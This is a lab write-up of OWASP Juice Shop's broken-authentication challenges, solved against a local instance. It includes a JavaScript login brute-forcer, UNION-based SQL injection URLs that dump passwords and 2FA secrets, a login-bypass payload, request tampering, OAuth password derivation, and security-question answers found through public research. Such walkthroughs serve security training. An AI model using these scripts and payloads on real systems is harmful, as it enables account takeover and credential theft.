
Broken Authentication

Log in with the administrator’s credentials without previously changing them (Challenge 1)
I tried logging in with the administrator's email and a random password, and captured the
login request in the process.

I sent it to Intruder and set up a Sniper attack with a password payload.

I noticed that the "common.txt" wordlist contained easy-to-guess passwords.


I copied and pasted the contents of the wordlist into Intruder’s Payloads tab and waited for a
200 status code. I was then logged in, and this challenge was successfully completed.
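As an added example (not code from the original write-up), the same Sniper-style attack scripted in JavaScript, so the loop that Burp Intruder runs is visible. It assumes Juice Shop's login endpoint is POST /rest/user/login taking a JSON body with email and password, that a correct password answers HTTP 200 and a wrong one 401, and that the administrator account is admin@juice-sh.op; the wordlist and the offline oracle below are constructed for the demo and are not the contents of common.txt.

```javascript
// Added example (not code from the original write-up): the Sniper-style
// password guessing that Burp Intruder performed, scripted so the loop is
// visible. Assumptions: Juice Shop's login endpoint is POST /rest/user/login
// with a JSON body {email, password}, a correct password answers HTTP 200 and
// a wrong one 401, and the administrator account is admin@juice-sh.op.
// The wordlist and the offline oracle below are constructed for this demo and
// are not the contents of common.txt.

const BASE_URL = process.env.JUICE_SHOP_URL || 'http://localhost:3000';

// Live oracle: one login attempt over HTTP (needs Node 18+ for global fetch).
// Returns true only for the status code Intruder was filtered on, 200.
async function httpLogin(email, password) {
  const res = await fetch(`${BASE_URL}/rest/user/login`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ email, password }),
  });
  return res.status === 200;
}

// One payload position (the password), one candidate per wordlist entry.
// Stops at the first candidate the oracle accepts and reports how many
// requests that took; password is null when the whole list was exhausted.
async function findPassword(email, wordlist, tryLogin = httpLogin) {
  let attempts = 0;
  for (const candidate of wordlist) {
    attempts += 1;
    if (await tryLogin(email, candidate)) {
      return { password: candidate, attempts };
    }
  }
  return { password: null, attempts };
}

// Constructed wordlist for the offline run (NOT the real common.txt).
const DEMO_WORDLIST = ['123456', 'password', 'qwerty', 'letmein', 'admin123', 'welcome'];

// Constructed stand-in for the server: accepts exactly one password, so the
// search logic can be exercised without a running Juice Shop.
function makeFakeOracle(correctPassword) {
  return async (_email, password) => password === correctPassword;
}

async function demo() {
  // Offline: the fake oracle "knows" admin123, found on the fifth attempt.
  return findPassword('admin@juice-sh.op', DEMO_WORDLIST, makeFakeOracle('admin123'));
}

if (typeof require === 'function' && require.main === module) {
  demo().then((result) => console.log(result));
}
```

Against a live instance, call findPassword with the real wordlist and leave the oracle at its default httpLogin; every line of the file becomes one request. The attack only works because the endpoint answers each attempt the same way no matter how many there are, which is the weakness this challenge exercises; an account lockout or per-account rate limit would stop the loop long before the right candidate came up.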

Reset Jim’s password via the Forgot Password mechanism (Challenge 2)
I entered Jim's email at the login page, as I didn't know his password, and then initiated the
password reset process by selecting the "Forgot Password" option.
The security question asked for Jim's brother's name, and since the question hinted that Jim
is a celebrity, I entered "Samuel" as his brother's name. After submitting the request, I received
a 200 response, indicating success, and so I was able to reset Jim's password.
Reset the password of Bjoern’s OWASP account via the Forgot Password (Challenge 3)
I entered "bjoern@owasp.org" as his email and found his favorite pet's name, "Zaya," via a
Twitter post.
I provided "Zaya" as the answer to the security question, and this successfully allowed me to
reset Bjoern's OWASP account password.

Log in with Chris' erased user account (Challenge 4)


I retrieved all the user credentials via SQL injection, then searched for Chris' email.

Upon finding "chris.pike@juice-sh.op," I used SQL injection to bypass the login, successfully
solving this challenge.

Reset Bender’s password via the Forgot Password (Challenge 5)
I knew Bender's email but didn't know the password, so I clicked on "Forgot Password."
Then the security question appeared, asking for the company Bender first worked for as an
adult. I searched for Bender on Google and found out he's a robot.

I discovered that Bender had a job at the metalworking factory, and I learned about the
suicide booths.

Finally, based on this information, I guessed that the answer might be "Stop'n'Drop". I
entered it as the answer to the security question, and the challenge was solved.

Log in with Bjoern’s Gmail account (Challenge 6)


Reference: Challenge Solution
At first, I had no idea how to solve this challenge, and I wasn't familiar with OAuth either, so
I referred to the solution documentation to get an idea of how to proceed.
I logged in with my personal Google account and, using the debugger in the browser's
developer tools, discovered how the OAuth login is handled.

I knew Bjoern's email, which is "bjoern.kimminich@gmail.com". There was a function written
for the OAuth login that first split the email into characters, then reversed the split string and
joined it back together. After that, the string was encoded with the btoa method, which returns
the base64 encoding of its input. For example, btoa("Hello World!") gives "SGVsbG8gV29ybGQh".
I ran all these steps in the console, copied the encoded string, and pasted it into the
password field. This solved the challenge!
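Carrying the steps above through in code, as an added example that is not the write-up's own console session: the function reproduces the derivation described (split, reverse, join, base64-encode) and also the reverse direction, so a captured password can be checked for being nothing more than an encoded email address. Buffer is used in place of the browser's btoa so the script also runs under Node; for ASCII input the two agree (an assumption this example relies on).

```javascript
// Added example (not the write-up's own console session): reproduces the
// password Juice Shop's client derives for a Google OAuth user, following the
// steps described above: split the email into characters, reverse, join,
// then base64-encode. Buffer stands in for the browser's btoa so this also
// runs under Node; for ASCII input the two give identical output (assumption).

function oauthPassword(email) {
  const reversed = email.split('').reverse().join('');
  // Same result as btoa(reversed) in the browser for ASCII email addresses.
  return Buffer.from(reversed, 'utf8').toString('base64');
}

// The inverse: decode a captured password and undo the reversal. If the
// result is a well-formed email address, the "password" is not a secret at
// all but a value anyone who knows the address can compute.
function emailFromOauthPassword(password) {
  return Buffer.from(password, 'base64').toString('utf8').split('').reverse().join('');
}

// The encoding step on its own, to check it against the example in the text:
// btoa("Hello World!") is "SGVsbG8gV29ybGQh".
function encodeExample(text) {
  return Buffer.from(text, 'utf8').toString('base64');
}

if (typeof require === 'function' && require.main === module) {
  const pw = oauthPassword('bjoern.kimminich@gmail.com');
  console.log(pw);                          // value to paste into the password field
  console.log(emailFromOauthPassword(pw));  // round-trips back to the email
}
```

The round trip is the check a practitioner wants: if emailFromOauthPassword returns the address you started from, the account's password is derived entirely from public information and is no stronger than the OAuth flow that was supposed to replace it.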
Change Bender’s password into slurmCl4ssic (Challenge 7)
I found Bender's email but didn't know the password. I used SQL injection to log in and then
accessed the password change mechanism. There, I attempted to change Bender's
password by providing an arbitrary value as the current password and "slurmCl4ssic" as the
new one. But the system said the current password was wrong. To bypass this, I intercepted
the request, removed the current password parameter, and only included "slurmCl4ssic" as
the new password. That's how I changed Bender's password.
Reset the password of Bjoern’s account via the Forgot Password mechanism (Challenge 8)
I found Bjoern's email but didn't know the password, so I used SQL injection to log in. When
I accessed the password change mechanism, a security question prompted me for Bjoern's
postal code. After some searching, I found Bjoern's postal code and entered it. With that, I
was able to reset Bjoern's password and solve the challenge.
Solve the 2FA challenge for user "wurstbrot" (Challenge 9)
I noticed the user's email address, wurstbrot@juice-sh.op, on the administration page. To
retrieve a list of all user credentials via SQL injection, I crafted various payloads.

I first tried this payload, and it failed with "no such column: 2fa":

http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20users--

Then I tried this payload, and it failed with "no such column: 2fakey":

http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fakey,null,null,null,null%20from%20users--

Finally, I tried this payload, and it succeeded with a 200 response, as this column exists:

http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,totpsecret,null,null,null,null%20from%20users--

Payload understanding

1. ')) : closes the string literal and the two parentheses of the search query's WHERE clause,
so everything that follows is parsed as new SQL instead of search text.
2. union select : appends the rows of a second SELECT to the result set of the product search,
so they come back in the same JSON response.
3. null,id,email,password,totpsecret,null,null,null,null : the columns selected from the
users table. Nine values are needed because a UNION must produce the same number of
columns as the product query; each null is a placeholder for a position I'm not interested in,
and the interesting values are placed where the response renders them.
4. from users : the table the rows are taken from.
5. -- : the SQL comment marker, which discards the remainder of the original query.

The column name had to be guessed, and the server's verbose error ("no such column: ...")
confirmed or ruled out each guess; that error leak is what made the third attempt a sure thing.

In the response from the successful SQL injection payload, I found the entry of user
wurstbrot@juice-sh.op with a secret key named
'IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH' for 2FA.

1. I went to http://localhost:3000/login and used SQL injection to log in, with
wurstbrot@juice-sh.op'-- as the username and anything as the password.
2. I was presented with the two-factor authentication input screen. Using Google Authenticator,
I created a new entry with wurstbrot@juice-sh.op as the account and the aforementioned
secret as the key. It generated a time-based 6-digit code, which I entered into the 2FA field in
Juice Shop.

With that, the challenge was successfully solved.
